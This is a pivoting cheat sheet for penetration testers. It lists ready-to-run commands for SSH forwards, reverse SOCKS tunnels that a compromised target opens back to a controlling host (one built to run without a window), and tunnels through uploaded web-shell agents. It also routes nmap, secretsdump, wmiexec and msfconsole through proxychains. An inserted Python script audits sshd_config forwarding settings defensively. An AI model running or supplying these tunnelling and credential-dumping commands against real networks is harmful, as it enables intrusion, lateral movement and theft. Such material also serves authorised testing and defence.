Pivoting
With the exception of the SSH commands, nothing in this list requires authentication, and everything can be run as a normal user; no admin privileges needed!
SSH
Opens a dynamic SOCKS proxy that listens on port 1234.
ssh USER@HOST -D 1234 -fN
Remote port forward using plink.
plink USER@HOST -pw password -R 3388:127.0.0.1:3389
rdesktop 127.0.0.1:3388
Using sshuttle, a transparent proxy server that works as a poor man’s VPN.
sshuttle --dns -r USER@HOST 0/0
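Every SSH command above relies on the server allowing TCP forwarding. As an added example (not part of the original cheat sheet), here is a small Python audit that parses an sshd_config and reports whether the dynamic (-D) and remote (-R) forwarding those commands need would be permitted. It assumes the OpenSSH keyword defaults (AllowTcpForwarding yes, GatewayPorts no, PermitOpen any), evaluates only the global section before the first Match block, and uses a constructed sample config.

```python
"""Audit an sshd_config for settings that permit SSH port-forwarding pivots.

Added example, not from the original page. Assumes OpenSSH defaults:
  AllowTcpForwarding yes   -> -D, -L and -R are all permitted
  GatewayPorts no          -> -R listeners bind to loopback only
  PermitOpen any           -> no destination restriction on -D/-L
Only the global section (before the first Match block) is evaluated.
"""
import re
from dataclasses import dataclass

# Constructed sample config for the demo; not taken from any real host.
SAMPLE_CONFIG = """
# Hardened jump host
Port 22
AllowTcpForwarding no
GatewayPorts no
Match User deploy
    AllowTcpForwarding local
"""

DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no", "permitopen": "any"}


@dataclass
class ForwardingPolicy:
    allow_tcp_forwarding: str
    gateway_ports: str
    permit_open: str

    @property
    def dynamic_forward_allowed(self) -> bool:
        # ssh -D (and -L) open direct-tcpip channels: needs yes/local/all
        return self.allow_tcp_forwarding in ("yes", "local", "all")

    @property
    def remote_forward_allowed(self) -> bool:
        # ssh -R / plink -R request forwarded-tcpip: needs yes/remote/all
        return self.allow_tcp_forwarding in ("yes", "remote", "all")

    @property
    def remote_forward_exposed(self) -> bool:
        # With GatewayPorts, a -R listener can bind a non-loopback address
        return self.remote_forward_allowed and self.gateway_ports in ("yes", "clientspecified")


def parse_global_section(text: str) -> dict:
    """Return keyword -> value for the global section, keys lower-cased.

    Stops at the first Match block. The first occurrence of a keyword wins,
    which mirrors sshd's first-obtained-value rule.
    """
    values = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("match"):
            break
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        values.setdefault(key, value)
    return values


def policy_from_config(text: str) -> ForwardingPolicy:
    values = {**DEFAULTS, **parse_global_section(text)}
    return ForwardingPolicy(values["allowtcpforwarding"],
                            values["gatewayports"],
                            values["permitopen"])


def audit(text: str) -> list:
    """Return human-readable findings; an empty list means forwarding is off."""
    p = policy_from_config(text)
    findings = []
    if p.dynamic_forward_allowed:
        findings.append("AllowTcpForwarding permits -D/-L: SOCKS pivot possible")
    if p.remote_forward_allowed:
        findings.append("AllowTcpForwarding permits -R: reverse port forward possible")
    if p.remote_forward_exposed:
        findings.append("GatewayPorts lets -R listeners bind non-loopback addresses")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG) or ["no forwarding findings"]:
        print(finding)
```

Run it against a real sshd_config by passing the file contents to audit(). Remember that a Match block can re-enable forwarding for specific users or groups, as the sample does for the deploy user, so those blocks deserve a separate look.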
POWERSHELL
SOCKS proxy with PowerShell using Invoke-SocksProxy.
Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 10800 -threads 400
plink USER@HOST -pw password -R 1080:127.0.0.1:10800
Supports reverse connections as well!
git clone https://github.com/p3nt4/Invoke-SocksProxy.git && cd Invoke-SocksProxy
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout private.key -out cert.pem
openssl x509 -in cert.pem -noout -sha1 -fingerprint | cut -d "=" -f 2 | tr -d ":"
python ReverseSocksProxyHandler.py 443 1080 ./cert.pem ./private.key
On the target machine, run these commands.
Import-Module .\Invoke-SocksProxy.psm1
Invoke-ReverseSocksProxy -remotePort 443 -useSystemProxy -remoteHost HOST
GO
Reverse SOCKS5 implementation using revsocks.
git clone https://github.com/kost/revsocks.git
go get github.com/hashicorp/yamux
go get github.com/armon/go-socks5
go get github.com/kost/go-ntlmssp
cd revsocks
GOOS=windows GOARCH=amd64 go build -ldflags -H=windowsgui
revsocks -listen :443 -socks 127.0.0.1:1080 -pass PASSWORD
revsocks -connect HOST:443 -pass PASSWORD
WEB APPLICATION
Using pivotnacci.
git clone https://github.com/blackarrowsec/pivotnacci.git
cd pivotnacci && pip3 install -r requirements.txt
python3 setup.py install
pivotnacci https://HOST/agent.php --password 'PASSWORD' -p 1080
Via reGeorg.
git clone https://github.com/sensepost/reGeorg.git && cd reGeorg
python reGeorgSocksProxy.py -p 1080 -u http://HOST/tunnel.jsp
With Tunna.
git clone https://github.com/SECFORCE/Tunna.git && cd Tunna
python proxy.py -u http://HOST/agent.aspx -l 1080 -v
PROXYCHAINS
Once everything is set up and you have a working SOCKS proxy, you can make use of proxychains.
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng
./configure --prefix=/usr --sysconfdir=/etc
make && make install && make install-config
proxychains4 -q nmap -sT -Pn -sV HOST -p 80,445,3389
proxychains4 -q secretsdump.py
proxychains4 -q wmiexec.py
proxychains4 -q crackmapexec
proxychains4 -q firefox
proxychains4 -q msfconsole